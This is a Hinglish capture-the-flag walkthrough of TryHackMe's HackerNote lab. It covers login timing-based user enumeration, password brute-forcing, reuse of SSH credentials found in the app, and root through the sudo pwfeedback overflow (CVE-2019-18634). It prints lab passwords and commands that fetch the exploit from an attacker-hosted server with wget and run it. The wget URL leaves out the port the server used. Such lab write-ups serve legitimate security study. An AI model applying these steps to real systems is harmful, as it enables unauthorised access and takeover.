TryHackMe HackerNote Write-Up: Exploitation, Privilege Escalation & Buffer Overflow Guide
1. Executive Summary :
Is walkthrough mein humne TryHackMe ke HackerNote machine par host ki gayi ek vulnerable Golang web application ko exploit karne ka process detail mein bataya hai. Ismein reconnaissance (jaankari ikattha karna), vulnerability analysis (kamzori dhundhna), exploitation (kamzori ka faayda uthana), aur privilege escalation (adhik adhikar lena) ke steps shamil hain, jiska aakhri goal target system par poora control hasil karna hai.
2. Methodology :
Reconnaissance: Target machine ke baare mein shuruati jaankari ikatthi ki gayi, jaise ki open ports aur running services.
Vulnerability Analysis: Golang web application mein exploit ki ja sakne wali kamzoriyaan pehchaani gayi.
Exploitation: Pata chali hui vulnerabilities ka use karke initial access hasil kiya gaya.
Privilege Escalation: Aur bhi detail enumeration ki gayi aur ek buffer overflow exploit ka use karke root access tak pahunch banayi gayi.
3. Reconnaissance :
Network Scanning:
Command Chalaya:
Results:
Open Ports:
Port 22 — SSH: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
Port 80 — HTTP: Golang net/http server (Go-IPFS JSON-RPC ya InfluxDB API)
Port 8080 — HTTP: Golang net/http server (Go-IPFS JSON-RPC ya InfluxDB API)
Services Detected:
Service versions ke saath kuch khas configurations bhi identify hui, jo possible entry points ko reveal karti hain.
4. Scanning and Enumeration :
Service Enumeration:
HTTP Service:
URL: http://10.10.86.37
Tools Used: Feroxbuster
Findings:
Discovered Directories/Files:
* /index.html
* /notes
Yeh directories aur files identify karne se web application ke structure ka idea mila aur aage ke exploitation ke liye helpful information mili.
5. Vulnerability Analysis :
Identified Vulnerabilities:
User Enumeration:
Ek test account banakar application ke responses ko analyze kiya gaya jab galat usernames aur passwords use kiye gaye. Jab valid username use kiya gaya to timing delay observe hua, jo batata hai ki username valid hai — isse user enumeration possible hua.
Tools Used: Burp Suite (Python scripts ka bhi use kiya ja sakta hai).
Affected Service: Golang Web Application
Potential Impact: Attackers systematically alag-alag usernames test karke valid users ka pata laga sakte hain.
Evidence: Discovered user: james
6. Exploitation :
Attack Vectors:
Discovered vulnerability ka exploit karke password brute-force karne ke liye ek wordlist generate ki gayi taaki web application tak access hasil kiya ja sake.
Steps to Reproduce:
Wordlist Generate Karo:
Hashcat-utils ka use karke “color + number” ke hints ke saath wordlist banayi gayi../combinator.bin ../../colors.txt ../../numbers.txt > ../../word.txt
Burp Suite Intruder ka Use Karo:
Burp Suite Intruder tool se password field ko select karo aur generated wordlist ko brute-force attack ke liye apply karo.Login Karo:
Discovered username (james) aur brute-forced password (blue7) ke saath web application mein login karo.SSH Credentials Locate Karo:
Web app mein ek note locate kiya gaya jisme james ke SSH credentials the.
Results:
Brute-forced Credentials:
Username: james
Web app password: blue7
SSH password: dak4ddb37b
7. Post-Exploitation :
Access Obtained:
Successfully SSH ke through login kiya gaya using credentials james:dak4ddb37b.
Initial Enumeration:
sudo -l command use karke accessible sudo commands check kiye gaye. Unfortunately, current user root ke naam pe koi bhi commands run nahi kar sakta tha. Lekin jab password enter kiya gaya, toh asterisks display ho rahe the, jo by default nahi hota.
Yeh configuration pwdfeedback ka indication thi, jo ek recent CVE (CVE-2019-18634) se related hai. Yeh vulnerability specific conditions mein exploit ho sakti thi, jaise ki buffer overflow.
Data Retrieved:
Target system se sensitive information extract ki gayi, jo aage attack ko aage badhane mein madadgar sabit hui.
8. Privilege Escalation :
Initial Access:
Low-privilege user (james) ke roop mein initial access mila.
Enumeration for Escalation:
Tools Used: Buffer Overflow Proof-of-Concept (PoC) tool.
Findings: Privilege escalation ke liye potential paths identify kiye gaye, jisme SUID binaries aur misconfigurations shamil thi.
Exploitation Steps:
Exploit Repository Clone Karo:
Exploit Ko Compile Karo:
make exploitExploit Ko HTTP ke through Serve Karo:
python3 -m http.server 8000Target Par Exploit Download Karo:
wget http://10.17.10.64/exploitExploit Ko Executable Banao:
chmod +x exploitExploit Ko Execute Karo:
./exploit
Horaaay, got in as a root user!
Conclusion :
Yeh walkthrough essential skills dikhata hai jaise reconnaissance, vulnerability analysis, aur exploitation, jo network security aur web application flaws ko samajhne ke liye bohot zaroori hain. Yeh techniques eJPT certification ke topics ke saath closely align karti hain, isliye yeh exercise aapke problem-solving aur ethical hacking abilities ko enhance karne ke liye ek excellent practice hai.
